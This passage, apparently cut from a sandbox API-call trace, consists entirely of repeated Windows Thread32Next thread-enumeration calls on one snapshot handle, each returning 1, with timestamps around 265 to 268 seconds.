[0265.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.334] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.335] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.336] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.339] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.824] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.825] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0266.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0267.949] Thread32Next (hSnapshot=0x17c, 